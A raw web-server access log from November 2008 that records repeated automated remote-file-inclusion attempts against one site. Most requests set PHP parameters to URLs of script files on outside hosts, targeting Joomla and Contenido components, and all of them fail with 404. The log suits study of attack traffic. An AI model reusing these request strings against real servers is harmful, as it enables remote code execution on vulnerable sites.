128.130.57.131 - - [19/Nov/2008:16:24:12 -0800] "GET /logs/errors.php?error=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.agottahave.com"
128.130.57.131 - - [19/Nov/2008:16:24:25 -0800] "GET /logs/access_081002.log/errors.php?error=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.agottahave.com"
128.130.57.131 - - [19/Nov/2008:16:24:25 -0800] "GET /errors.php?error=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.agottahave.com"
128.130.57.131 - - [19/Nov/2008:16:24:26 -0800] "GET /logs/errors.php?error=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.agottahave.com"
124.0.210.117 - - [19/Nov/2008:16:31:40 -0800] "GET /logs/access_081002.log/errors.php?error=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.agottahave.com"
124.0.210.117 - - [19/Nov/2008:16:31:41 -0800] "GET /errors.php?error=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.agottahave.com"
124.0.210.117 - - [19/Nov/2008:16:31:42 -0800] "GET /logs/errors.php?error=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.agottahave.com"
124.0.210.117 - - [19/Nov/2008:16:36:45 -0800] "GET /logs/access_081002.log/errors.php?error=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.agottahave.com"
124.0.210.117 - - [19/Nov/2008:16:36:46 -0800] "GET /errors.php?error=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.agottahave.com"
124.0.210.117 - - [19/Nov/2008:16:36:46 -0800] "GET /logs/errors.php?error=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.agottahave.com"
202.181.99.55 - - [19/Nov/2008:16:38:58 -0800] "GET /logs/access_081004.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://jsthe.org/Media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
202.181.99.55 - - [19/Nov/2008:16:38:58 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://jsthe.org/Media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
202.181.99.55 - - [19/Nov/2008:16:38:59 -0800] "GET /logs/access_081004.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://jsthe.org/Media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
202.181.99.55 - - [19/Nov/2008:16:38:59 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://jsthe.org/Media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
202.181.99.55 - - [19/Nov/2008:16:38:59 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://jsthe.org/Media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
202.181.99.55 - - [19/Nov/2008:16:39:00 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://jsthe.org/Media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
202.181.99.55 - - [19/Nov/2008:16:39:53 -0800] "GET /logs/access_081004.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://jsthe.org/Media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
202.181.99.55 - - [19/Nov/2008:16:39:54 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://jsthe.org/Media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
202.181.99.55 - - [19/Nov/2008:16:39:54 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://jsthe.org/Media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
89.218.85.18 - - [19/Nov/2008:16:41:12 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gugakedu.co.kr/kboard//test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.agottahave.com"
89.218.85.18 - - [19/Nov/2008:16:41:12 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gugakedu.co.kr/kboard//test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.agottahave.com"
202.181.99.55 - - [19/Nov/2008:16:44:47 -0800] "GET /logs/access_080924.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://jsthe.org/Media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
202.181.99.55 - - [19/Nov/2008:16:44:47 -0800] "GET /logs/access_080924.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://jsthe.org/Media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
202.181.99.55 - - [19/Nov/2008:16:44:49 -0800] "GET /logs/access_080924.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://jsthe.org/Media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.agottahave.com"
222.233.52.18 - - [19/Nov/2008:16:47:06 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gugakedu.co.kr/kboard//test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.agottahave.com"
222.233.52.18 - - [19/Nov/2008:16:47:07 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gugakedu.co.kr/kboard//test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.agottahave.com"
128.130.57.131 - - [19/Nov/2008:16:48:01 -0800] "GET /logs/access_080927.log/errors.php?error=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.agottahave.com"
128.130.57.131 - - [19/Nov/2008:16:48:01 -0800] "GET /logs/access_080927.log/errors.php?error=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.agottahave.com"
128.130.57.131 - - [19/Nov/2008:16:50:47 -0800] "GET /logs/access_080927.log/errors.php?error=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.agottahave.com"
38.103.63.56 - - [19/Nov/2008:16:53:58 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.agottahave.com"
128.130.57.131 - - [19/Nov/2008:16:54:20 -0800] "GET /logs/access_080927.log/errors.php?error=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.agottahave.com"